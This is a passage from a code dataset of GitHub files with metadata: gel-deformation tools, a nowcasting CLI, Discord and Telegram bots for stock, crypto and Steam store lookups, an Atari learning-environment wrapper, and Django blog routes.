"17441391104", "text": "from collections import deque\ndx=[-2,-1,2,1,2,1,-2,-1]\ndy=[1,2,1,2,-1,-2,-1,-2]\n\ndef bfs(sx,sy,ex,ey, l):\n visited = [[0] * l for _ in range(l)]\n q = deque()\n q.append([sx,sy])\n visited[sy][sx] = 1\n while bool(q):\n x, y = q.popleft()\n for i in range(8):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx=self.bound\n cond_y = abs(nextpoint[1])>=self.bound\n cond_z = abs(nextpoint[2])>=self.bound\n\n if cond_x or cond_y or cond_z:\n break\n\n self.points = np.vstack((self.points, nextpoint)) \n\n def save_to_vtk(self, fname, sep=\",\"):\n point_data = pyvtk.PointData(\\\n pyvtk.Vectors(self.u, name=\"u\"),\n pyvtk.Tensors(arr_to_tensor(self.F), name=\"F\"),\n pyvtk.Tensors(arr_to_tensor(self.C), name=\"C\"),\n pyvtk.Tensors(arr_to_tensor(self.R), name=\"R\"),\n pyvtk.Tensors(arr_to_tensor(self.U), name=\"U\"),\n pyvtk.Vectors(self.eigval, name=\"w\"),\n pyvtk.Tensors(arr_to_tensor(self.eigvec), name=\"v\"),\n pyvtk.Scalars(self.mu, name=\"mu\"),\n pyvtk.Scalars(self.stretches, \"stretches\")\n )\n\n # print(pyvtk.Tensors(3, \"3\"))\n\n vtk = pyvtk.VtkData(\\\n pyvtk.PolyData(self.points), \n point_data\n )\n\n vtk.tofile(fname) \n\n def calc_deformation(self):\n \n # Deformations\n super().calc_deformation()\n\n # Stretches\n npoints = self.points.shape[0]\n v = np.broadcast_to(self.direction, (npoints, 3))\n v = np.ascontiguousarray(v)\n v = v.reshape((-1, 3, 1))\n\n self.stretches = np.matmul(v.transpose(0, 2, 1), np.matmul(self.C, v)) ** 0.5\n self.stretches = self.stretches.flatten()\n\n def assemble_df(self):\n super().assemble_df()\n self.df[\"stretches\"] = self.stretches\n\n\n", "repo_name": "jdsteinman/Gel-Model", "sub_path": "bar/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 12505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.asarray", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.ndim", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "pyvtk.PointData", "line_number": 148, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 149, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 150, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 151, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 152, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 153, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 154, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 155, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 156, "usage_type": "call"}, {"api_name": "pyvtk.VtkData", "line_number": 160, "usage_type": "call"}, {"api_name": "pyvtk.PolyData", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "scipy.linalg.polar", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.hsplit", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.hsplit", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 354, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 380, "usage_type": "call"}, {"api_name": "pyvtk.PointData", "line_number": 383, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 384, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 385, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 386, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 387, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 388, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 389, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 390, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 391, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 392, "usage_type": "call"}, {"api_name": "pyvtk.VtkData", "line_number": 397, "usage_type": "call"}, {"api_name": "pyvtk.PolyData", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.broadcast_to", "line_number": 411, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 415, "usage_type": "call"}]} +{"seq_id": "9297894862", "text": "\"\"\"\nCommand-Line interface functionality for synchronization\n\"\"\"\nimport json\nimport argparse\nimport cattr\nfrom nowcastlib.pipeline.structs import config\nfrom nowcastlib.pipeline import sync\n\n\ndef configure_parser(action_object):\n \"\"\"Configures the subparser for our preprocess command\"\"\"\n sparser = action_object.add_parser(\n \"sync\",\n description=\"Synchronize datasets\",\n help=\"Run `nowcastlib sync -h` for further help\",\n formatter_class=argparse.HelpFormatter,\n )\n sparser.add(\n \"-c\",\n \"--config\",\n required=True,\n help=\"path to JSON file following the DataSet format. See docs for available fields\",\n )\n\n\ndef run(args):\n \"\"\"runs appropriate function based on provided cli args\"\"\"\n with open(args.config) as json_file:\n options = json.load(json_file)\n cattr_cnvrtr = cattr.GenConverter(forbid_extra_keys=True)\n dataset_config = cattr_cnvrtr.structure(options, config.DataSet)\n return sync.synchronize_dataset(dataset_config)\n", "repo_name": "thesofakillers/nowcastlib", "sub_path": "nowcastlib/pipeline/sync/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 1020, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.HelpFormatter", "line_number": 17, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 30, "usage_type": "call"}, {"api_name": "cattr.GenConverter", "line_number": 31, "usage_type": "call"}, {"api_name": "nowcastlib.pipeline.structs.config.DataSet", "line_number": 32, "usage_type": "attribute"}, {"api_name": "nowcastlib.pipeline.structs.config", "line_number": 32, "usage_type": "name"}, {"api_name": "nowcastlib.pipeline.sync.synchronize_dataset", "line_number": 33, "usage_type": "call"}, {"api_name": "nowcastlib.pipeline.sync", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "33674957269", "text": "import hikari\nimport requests\nimport os\nfrom dotenv import load_dotenv\nfrom nft import fetcher\nfrom crypto import coinFetcher\nfrom stocks import stockFetcher, afterHoursFetcher\nload_dotenv(override=False)\ndiscord_token = os.environ.get('TOKEN')\nadmin_token=os.environ.get('ADMIN')\n\n\n#intent\nbot = hikari.GatewayBot(\n discord_token,\n intents=hikari.Intents.ALL_UNPRIVILEGED # Add this\n | hikari.Intents.MESSAGE_CONTENT, # \n)\n\n\n@bot.listen()\nasync def ping(event: hikari.GuildMessageCreateEvent) -> None:\n if event.content and event.content.startswith(\"t\") and event.content[1] == \" \":\n message = (event.content[2:]).upper()\n coins = message.split(\" \")\n response = \"\"\n for coin in coins:\n price = coinFetcher(coin)\n response += f\"**{coin}**: ${price}\\n\"\n await event.message.respond(response)\n \n if event.content and event.content.startswith(\"p\") and event.content[1] == \" \":\n message = (event.content[2:]).upper()\n stocks = message.split()\n for stock in stocks:\n embed = stockFetcher(stock, event.message)\n await event.message.respond(embed=embed)\n\n if event.content and event.content.startswith(\"pa\") and event.content[2] == \" \":\n message = (event.content[3:]).upper()\n stocks = message.split()\n for stock in stocks:\n embed = afterHoursFetcher(stock, event.message)\n await event.message.respond(embed=embed)\n\nbot.run()\n", "repo_name": "Jckhe/Jack-Bot", "sub_path": "jackbot.py", "file_name": "jackbot.py", "file_ext": "py", "file_size_in_byte": 1491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "hikari.GatewayBot", "line_number": 14, "usage_type": "call"}, {"api_name": "hikari.Intents", "line_number": 16, "usage_type": "attribute"}, {"api_name": "hikari.Intents", "line_number": 17, "usage_type": "attribute"}, {"api_name": "hikari.GuildMessageCreateEvent", "line_number": 22, "usage_type": "attribute"}, {"api_name": "crypto.coinFetcher", "line_number": 28, "usage_type": "call"}, {"api_name": "stocks.stockFetcher", "line_number": 36, "usage_type": "call"}, {"api_name": "stocks.afterHoursFetcher", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "9468537762", "text": "import sys\nimport os\nfrom ale_python_interface import ALEInterface\nimport cv2\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass Environment:\n def __init__(self, rom_file, args):\n self.ale = ALEInterface()\n if args.display_screen:\n if sys.platform == 'darwin':\n import pygame\n pygame.init()\n self.ale.setBool('sound', False) # Sound doesn't work on OSX\n elif sys.platform.startswith('linux'):\n self.ale.setBool('sound', True)\n self.ale.setBool('display_screen', True)\n\n self.ale.setInt('frame_skip', args.frame_skip)\n self.ale.setFloat('repeat_action_probability', args.repeat_action_probability)\n self.ale.setBool('color_averaging', args.color_averaging)\n\n if args.random_seed:\n self.ale.setInt('random_seed', args.random_seed)\n\n if args.record_screen_path:\n if not os.path.exists(args.record_screen_path):\n logger.info(\"Creating folder %s\" % args.record_screen_path)\n os.makedirs(args.record_screen_path)\n logger.info(\"Recording screens to %s\", args.record_screen_path)\n self.ale.setString('record_screen_dir', args.record_screen_path)\n\n if args.record_sound_filename:\n logger.info(\"Recording sound to %s\", args.record_sound_filename)\n self.ale.setBool('sound', True)\n self.ale.setString('record_sound_filename', args.record_sound_filename)\n\n self.ale.loadROM(rom_file)\n\n if args.minimal_action_set:\n self.actions = self.ale.getMinimalActionSet()\n logger.info(\"Using minimal action set with size %d\" % len(self.actions))\n else:\n self.actions = self.ale.getLegalActionSet()\n logger.info(\"Using full action set with size %d\" % len(self.actions))\n logger.debug(\"Actions: \" + str(self.actions))\n\n self.dims = (args.screen_height, args.screen_width)\n\n def numActions(self):\n return len(self.actions)\n\n def restart(self):\n self.ale.reset_game()\n\n def act(self, action):\n reward = self.ale.act(self.actions[action])\n return reward\n\n def getScreen(self):\n screen = self.ale.getScreenGrayscale()\n resized = cv2.resize(screen, self.dims)\n return resized\n\n def isTerminal(self):\n return self.ale.game_over()\n", "repo_name": "rickyHong/simple_dqn", "sub_path": "src/environment.py", "file_name": "environment.py", "file_ext": "py", "file_size_in_byte": 2188, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "ale_python_interface.ALEInterface", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.platform.startswith", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "18843669209", "text": "# coding: utf-8\n\nimport asyncio\nimport json\nimport re\nfrom datetime import datetime\nfrom urllib import parse\n\nimport aiohttp\nimport asyncio_redis\nimport telepot\nimport telepot.aio\nfrom telepot.namedtuple import ReplyKeyboardMarkup, ReplyKeyboardRemove\n\nfrom constants import GAME_CARD_TEMPLATE, NEWS_CARD_TEMPLATE, LANG, CC\nfrom utils import SearchSuggestParser, cache_steam_response, group\n\n\nclass SteamBot(telepot.aio.Bot, telepot.helper.AnswererMixin):\n\n def __init__(self, *args, config=None, **kwargs):\n super(SteamBot, self).__init__(*args, **kwargs)\n self._answerer = telepot.aio.helper.Answerer(self)\n self.config = config\n self.cache_time = self.config.get('cache_time', 10)\n self.redis_conn = None\n self.loop.create_task(self.initialize_redis())\n self.routes = {\n '/search': self.search_game,\n '/app_': self.game_card_answer,\n '/scr_': self.screenshots_answer,\n '/news_': self.last_news_answer,\n '/feedback': self.feedback_answer,\n '/settings': self.settings_answer,\n '/lang': self.set_lang,\n '/cc': self.set_cc,\n '/start': self.welcome_answer\n }\n\n async def initialize_redis(self):\n self.redis_conn = await asyncio_redis.Pool.create(\n host=self.config['redis']['ip'],\n port=self.config['redis']['port'],\n db=self.config['redis']['db'],\n poolsize=5\n )\n\n @cache_steam_response\n async def get_content_from_url(self, url, resp_format=None):\n async with aiohttp.ClientSession(loop=self.loop) as client:\n async with client.get(url) as resp:\n if resp.status != 200:\n return\n if resp_format == 'text':\n result = await resp.text()\n elif resp_format == 'json':\n result = await resp.json()\n else:\n result = await resp.content.read()\n return result\n\n async def get_search_results(self, term, settings):\n search_url = u'https://store.steampowered.com/search/suggest?term={}&f=games&l={}&cc={}'.format(\n parse.quote_plus(term),\n settings.get('lang'),\n settings.get('cc')\n )\n content = await self.get_content_from_url(search_url, resp_format='text')\n parser = SearchSuggestParser()\n parser.feed(content)\n return parser.result\n\n async def get_appdetails(self, appid, settings={}):\n url = u'https://store.steampowered.com/api/appdetails/?appids={}&l={}&cc={}'.format(\n appid,\n settings.get('lang'),\n settings.get('cc')\n )\n content = await self.get_content_from_url(url, resp_format='json')\n return content[appid]['data'] if content else {}\n\n async def get_news(self, appid, count=3):\n url = u'https://api.steampowered.com/ISteamNews/GetNewsForApp/v0002/?appid={}&count={}&max_length=300&format=json'.format(\n appid,\n count\n )\n content = await self.get_content_from_url(url, resp_format='json')\n return content['appnews']['newsitems'] if content else {}\n\n @staticmethod\n def get_command(msg):\n if 'entities' in msg:\n for entity in msg['entities']:\n if entity['type'] == 'bot_command':\n offset, length = entity['offset'], entity['length']\n return msg['text'][offset:length], msg['text'][offset + length:].strip()\n return None, None\n\n @staticmethod\n def get_games_message(entries):\n msg_list = []\n if len(entries) != 0:\n for entry in entries:\n msg = u\"{cmd} {name} [steam]({href}) _{price}_\".format(\n name=entry['name'],\n href=entry['href'],\n price=entry['price'],\n cmd=u'/app\\_{}'.format(entry['appid'])\n )\n msg_list.append(msg)\n return u'\\n'.join(msg_list)\n return u'Nothing found'\n\n @staticmethod\n def clean_html(html):\n return re.sub('<[^<]+?>', '', html)\n\n @staticmethod\n def clean_markdown(text):\n return text.replace('_', '\\_').replace('*', '\\*')\n\n def get_game_card_message(self, appdetails):\n return GAME_CARD_TEMPLATE.format(\n appid=appdetails['steam_appid'],\n name=appdetails['name'],\n release_date=appdetails['release_date']['date'],\n metacritic=u'\\u2b50\\ufe0f{} [metacritics]({})'.format(\n appdetails['metacritic']['score'],\n appdetails['metacritic']['url']\n ) if 'metacritic' in appdetails else '',\n platforms=', '.join(\n [x[0] for x in appdetails['platforms'].items() if x[1]]),\n genres=', '.join(\n [x['description'] for x in appdetails['genres']]) if 'genres' in appdetails else '',\n publishers=', '.join(\n appdetails['publishers']) if 'publishers' in appdetails else '',\n price='{} {}'.format(appdetails['price_overview']['final'] / 100.0,\n appdetails['price_overview']['currency']) if 'price_overview' in appdetails else '',\n recommendations=appdetails['recommendations']['total'] if 'recommendations' in appdetails else '',\n screenshotscount=len(\n appdetails['screenshots']) if 'screenshots' in appdetails else '0',\n about_the_game=self.clean_html(appdetails['about_the_game'])[:500]\n )\n\n async def on_callback_query(self, msg):\n query_id, from_id, data = telepot.glance(msg, flavor='callback_query')\n print('Callback query:', query_id, from_id, data)\n self.route(from_id, data)\n\n async def game_search_answer(self, term, chat_id):\n user_info = await self.get_user(chat_id)\n settings = user_info.get('settings')\n msg = self.get_games_message(await self.get_search_results(term, settings))\n await self.sendMessage(chat_id, msg, parse_mode='markdown', disable_web_page_preview=True)\n\n async def game_card_answer(self, chat_id, command, args):\n appid = command.replace('/app_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'typing'))\n user_info = await self.get_user(chat_id)\n settings = user_info.get('settings')\n app_details = await self.get_appdetails(appid, settings)\n await self.sendMessage(chat_id, self.get_game_card_message(app_details), parse_mode='markdown')\n\n async def send_photo_from_url(self, url, photo_name, chat_id):\n downloaded_file = await self.get_content_from_url(url)\n await self.sendPhoto(chat_id, photo=(photo_name, downloaded_file))\n\n async def screenshots_answer(self, chat_id, command, args):\n appid = command.replace('/scr_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'upload_photo'))\n app_details = await self.get_appdetails(appid)\n for scr in app_details['screenshots']:\n loop.create_task(self.send_photo_from_url(\n scr['path_full'], 'scr-{}.jpg'.format(scr['id']), chat_id))\n\n async def last_news_answer(self, chat_id, command, args):\n appid = command.replace('/news_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'typing'))\n news_items = await self.get_news(appid)\n for item in news_items:\n msg = NEWS_CARD_TEMPLATE.format(\n title=item['title'],\n url=item['url'],\n pub_date=datetime.fromtimestamp(\n int(item['date'])).strftime(\"%B %d, %Y\"),\n feedlabel=item['feedlabel'],\n contents=self.clean_markdown(self.clean_html(item['contents'])).replace(\n '\\n', '').replace(' ', '')[:300],\n author=item['author']\n )\n loop.create_task(self.sendMessage(\n chat_id, msg, parse_mode='markdown'))\n\n def get_user_key(self, user_id):\n return 'user-{}'.format(user_id)\n\n async def save_user_settings(self, user_id, new_settings):\n key = self.get_user_key(user_id)\n user = await self.get_user(user_id)\n settings = user.get('settings', {})\n settings.update(new_settings)\n user['settings'] = settings\n await self.redis_conn.set(key, json.dumps(user))\n\n async def get_user(self, user_id):\n return json.loads(await self.redis_conn.get(self.get_user_key(user_id)))\n\n async def create_or_update_user(self, chat):\n key = self.get_user_key(chat['id'])\n user = await self.redis_conn.get(key)\n if not user:\n new_user = chat\n default_settings = {\n 'lang': 'english',\n 'cc': 'US'\n }\n new_user_serialized = json.dumps(\n {'info': new_user, 'settings': default_settings})\n await self.redis_conn.set(key, new_user_serialized)\n else:\n user = json.loads(user)\n if chat != user['info']:\n user['info'] = chat\n await self.redis_conn.set(key, json.dumps(user))\n\n async def on_inline_query(self, msg):\n async def compute_answer():\n query_id, from_id, query_string = telepot.glance(\n msg, flavor='inline_query')\n print('inline query: {} from_id: {}'.format(query_string, from_id))\n user_info = await self.get_user(from_id)\n settings = user_info.get('settings')\n results = await self.get_search_results(query_string, settings)\n articles = []\n for res in results:\n articles.append({\n 'type': 'article',\n 'id': res['appid'],\n 'title': res['name'],\n 'message_text': u'{} {} {}'.format(\n res['name'],\n res['price'],\n res['href']\n ),\n # 'url': res['href'],\n 'description': res['price'],\n 'thumb_url': res['image']\n })\n return {'results': articles}\n self._answerer.answer(msg, compute_answer)\n\n async def on_chosen_inline_result(self, msg):\n query_id, from_id, query_string = telepot.glance(\n msg, flavor='chosen_inline_result')\n print('Chosen Inline Result: {} {} from_id: {}'.format(\n query_id, query_string, from_id))\n await self.game_card_answer(query_id, from_id)\n\n async def search_game(self, chat_id, command, args):\n await self.sendChatAction(chat_id, 'typing')\n await self.game_search_answer(args, chat_id)\n\n async def set_lang(self, chat_id, command, args):\n lang = args.strip() if args else None\n if lang:\n await self.save_user_settings(chat_id, {'lang': LANG.get(lang)})\n await bot.sendMessage(chat_id, 'language saved', reply_markup=ReplyKeyboardRemove())\n else:\n markup = ReplyKeyboardMarkup(\n keyboard=group(['/lang' + x for x in LANG.keys()], 2),\n one_time_keyboard=True\n )\n await bot.sendMessage(chat_id, 'set language', reply_markup=markup)\n\n async def set_cc(self, chat_id, command, args):\n cc = args.strip() if args else None\n if cc:\n await self.save_user_settings(chat_id, {'cc': CC.get(cc)})\n await bot.sendMessage(chat_id, 'region saved', reply_markup=ReplyKeyboardRemove())\n else:\n markup = ReplyKeyboardMarkup(\n keyboard=group(['/cc' + x for x in CC.keys()], 3),\n one_time_keyboard=True\n )\n await bot.sendMessage(chat_id, 'set region', reply_markup=markup)\n\n async def feedback_answer(self, chat_id, command, args):\n msg = args.replace('/feedback ', '').strip()\n if msg:\n await self.sendMessage(\n self.config.get('admin_id'),\n 'feedback from: {}: {}'.format(chat_id, msg)\n )\n await self.sendMessage(chat_id, 'thank you for your feedback!')\n else:\n await self.sendMessage(chat_id, 'looks like your feedback is empty!')\n\n async def settings_answer(self, chat_id, command, args):\n await self.sendMessage(\n chat_id,\n \"change region: /cc\\n\"\n \"change language: /lang\\n\"\n )\n\n async def welcome_answer(self, chat_id, command, args):\n await self.sendMessage(\n chat_id,\n 'Welcome! Just type / for view list of commands, also you can use this bot with inline mode.\\n'\n 'For search a game just send message with game title'\n )\n\n def route(self, chat_id, command, args=None):\n func = None\n for cmd, fnc in self.routes.items():\n if command.find(cmd) != -1:\n func = fnc\n break\n\n if func:\n self.loop.create_task(func(chat_id, command, args))\n\n async def on_chat_message(self, msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n print(msg)\n await self.create_or_update_user(msg.get('chat'))\n command, args = self.get_command(msg)\n if not command:\n command, args = '/search', msg['text']\n self.route(chat_id, command, args)\n\n\nwith open('conf/config.json') as f:\n config = json.loads(f.read())\n\nloop = asyncio.get_event_loop()\ntoken = config.pop(\"telegram_token\")\nbot = SteamBot(token=token, config=config, loop=loop)\nloop.create_task(bot.message_loop())\nprint('Listening ...')\nloop.run_forever()\n", "repo_name": "AyumuKasuga/steambot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 13818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "telepot.aio", "line_number": 19, "usage_type": "attribute"}, {"api_name": "telepot.helper", "line_number": 19, "usage_type": "attribute"}, {"api_name": "telepot.aio.helper.Answerer", "line_number": 23, "usage_type": "call"}, {"api_name": "telepot.aio", "line_number": 23, "usage_type": "attribute"}, {"api_name": "asyncio_redis.Pool.create", "line_number": 41, "usage_type": "call"}, {"api_name": "asyncio_redis.Pool", "line_number": 41, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.cache_steam_response", "line_number": 48, "usage_type": "name"}, {"api_name": "urllib.parse.quote_plus", "line_number": 64, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 64, "usage_type": "name"}, {"api_name": "utils.SearchSuggestParser", "line_number": 69, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 116, "usage_type": "call"}, {"api_name": "constants.GAME_CARD_TEMPLATE.format", "line_number": 123, "usage_type": "call"}, {"api_name": "constants.GAME_CARD_TEMPLATE", "line_number": 123, "usage_type": "name"}, {"api_name": "telepot.glance", "line_number": 146, "usage_type": "call"}, {"api_name": "constants.NEWS_CARD_TEMPLATE.format", "line_number": 181, "usage_type": "call"}, {"api_name": "constants.NEWS_CARD_TEMPLATE", "line_number": 181, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 184, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 184, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 203, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 206, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 217, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 221, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 224, "usage_type": "call"}, {"api_name": "telepot.glance", "line_number": 228, "usage_type": "call"}, {"api_name": "telepot.glance", "line_number": 253, "usage_type": "call"}, {"api_name": "constants.LANG.get", "line_number": 266, "usage_type": "call"}, {"api_name": "constants.LANG", "line_number": 266, "usage_type": "name"}, {"api_name": "telepot.namedtuple.ReplyKeyboardRemove", "line_number": 267, "usage_type": "call"}, {"api_name": "telepot.namedtuple.ReplyKeyboardMarkup", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.group", "line_number": 270, "usage_type": "call"}, {"api_name": "constants.LANG.keys", "line_number": 270, "usage_type": "call"}, {"api_name": "constants.LANG", "line_number": 270, "usage_type": "name"}, {"api_name": "constants.CC.get", "line_number": 278, "usage_type": "call"}, {"api_name": "constants.CC", "line_number": 278, "usage_type": "name"}, {"api_name": "telepot.namedtuple.ReplyKeyboardRemove", "line_number": 279, "usage_type": "call"}, {"api_name": "telepot.namedtuple.ReplyKeyboardMarkup", "line_number": 281, "usage_type": "call"}, {"api_name": "utils.group", "line_number": 282, "usage_type": "call"}, {"api_name": "constants.CC.keys", "line_number": 282, "usage_type": "call"}, {"api_name": "constants.CC", "line_number": 282, "usage_type": "name"}, {"api_name": "telepot.glance", "line_number": 323, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 333, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 335, "usage_type": "call"}]} +{"seq_id": "43321434568", "text": "from django.conf.urls import url, include\n\nfrom . import views\n\n\napp_name = 'blog'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^createUser/$', views.createUser, name='createUser'),\n url(r'^registration/$', views.registration_page, name='registration_page'),\n url(r'^makepost/$', views.makepost, name='makepost'),\n url(r'^blogfeed/$', views.blogfeed, name='blogfeed'),\n url(r'^createposts/$', views.create_post, name='create_post'),\n url(r'^mylogin/$', views.mylogin, name='mylogin'),\n url(r'^logout_view/$', views.logout_view, name='logout_view'),\n url(r'^(?P[0-9]+)/$', views.singlepost, name='singlepost'),\n url(r'^savecomment/(?P[0-9]+)/$', views.savecomment, name='savecomment')\n]\n", "repo_name": "mschaeffer53/Marcel_CodeGuildPDX", "sub_path": "django/mainsite/blog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "9205060333", "text": "import logging\n\nfrom responsebot.common.exceptions import 